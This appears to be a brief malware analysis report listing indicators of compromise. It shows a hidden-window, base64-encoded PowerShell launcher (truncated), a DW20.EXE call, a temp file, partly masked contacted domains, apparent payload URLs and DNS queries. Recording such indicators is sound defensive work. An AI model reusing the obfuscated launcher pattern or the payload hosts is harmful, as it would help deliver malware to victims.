Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABOAGsAbgBrAG0AbQB2AGoAYQB1AG0AZwA9ACcAWQBuAGoAeQBpAHUAZQBrACcAOwAkAFMAaABoAHUAZgB5AHUAdQBpAHoAdwBoAGUAIAA9ACAAJwA0ADMAOAAnADsAJABNAHgAcQB4AGUAcgBqAGcAcwBwAG4...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\1263030.cvr
- 're####tsolution.com':80
- 're####tsolution.com':443
- 'cu#####.##rchhoff-automotive.com':443
- 'go#.app':443
- 'ww###lper.com':80
- http://re####tsolution.com/wp-admin/0d0572/
- http://ww###lper.com/comm/moneymakers/css/xzm96/
- 're####tsolution.com':443
- 'cu#####.##rchhoff-automotive.com':443
- 'go#.app':443
- DNS ASK re####tsolution.com
- DNS ASK cu#####.##rchhoff-automotive.com
- DNS ASK fe###hao.space
- DNS ASK go#.app
- DNS ASK ww###lper.com